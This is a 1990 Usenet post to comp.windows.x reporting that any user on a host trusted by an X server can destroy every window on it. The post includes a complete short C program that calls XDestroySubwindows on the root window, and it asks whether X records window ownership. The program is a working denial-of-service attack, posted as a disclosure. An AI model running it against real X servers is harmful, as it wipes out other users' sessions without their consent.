Path: utzoo!utgpu!jarvis.csri.toronto.edu!cs.utexas.edu!swrinde!zaphod.mps.ohio-state.edu!brutus.cs.uiuc.edu!apple!uokmax!uokmax.ecn.uoknor.edu!randy From: randy@uokmax.ecn.uoknor.edu (Longshot) Newsgroups: comp.windows.x Subject: I'm sure you all know... Message-ID: <1990Feb8.211508.2581@uokmax.uucp> Date: 8 Feb 90 21:15:08 GMT Sender: randy@uokmax.uucp (Longshot) Organization: Engineering Computer Network, University of Oklahoma, Norman, OK Lines: 39 This is a potential problem, and I'm sure I'm not the first to find it: #include #include #include main(argc,argv) int argc; char **argv; { Display *mydisplay; mydisplay = XOpenDisplay(""); if (!mydisplay) { fprintf(stderr,"Could not open display.\n"); exit(1); } XDestroySubwindows(mydisplay,DefaultRootWindow(mydisplay)); XCloseDisplay(mydisplay); } Needless to say, if you are on a host that is trusted to an X server, this small segment can wreck them. After this executes, ALL windows on the server bound to DISPLAY die quickly and completely. I first had someone run this from his X environment (an xterm running from twm), and then I ran it on an ascii terminal connected to a host that was trusted to the X server. Obviously, if a host is not permitted to a sever, this program will die, but here we run our servers on Suns and Mac II's, and most of the applications on our Encore, which is faster and can handle the load. The same Multimax averages 60-80 users during peak hours, any of which who know X could do this. Doesn't X keep some sort of identifier in a window structure or display structure that identifies the owner? This is nasty! Randy -- Randy J. Ray University of Oklahoma, Norman Campus (405)/325-5370 !chinet!uokmax!randy randy@uokmax.uucp randy@uokmax.ecn.uoknor.edu Flaming makes you feel better, sorta like popping the little plastic bubbles in packaging material. -Tim Perala